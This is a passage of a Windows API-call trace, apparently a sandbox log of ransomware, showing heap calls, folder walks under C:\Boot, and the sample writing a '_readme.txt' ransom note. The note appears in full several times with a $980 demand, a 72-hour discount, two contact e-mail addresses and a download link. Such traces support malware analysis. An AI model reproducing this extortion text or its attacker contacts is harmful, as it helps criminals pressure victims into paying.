hHeap=0x620000) returned 1 [0183.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0183.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0183.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83890 | out: hHeap=0x620000) returned 1 [0183.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0183.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7a838 | out: hHeap=0x620000) returned 1 [0183.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.481] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.486] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0183.486] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.486] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.487] PathFindFileNameW (pszPath="") returned="" [0183.487] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.487] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.487] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.487] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.487] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0183.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.488] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0183.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.490] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.490] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.490] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.491] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*" (normalized: "c:\\boot\\cs-cz\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.492] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.492] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.492] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.492] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.493] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 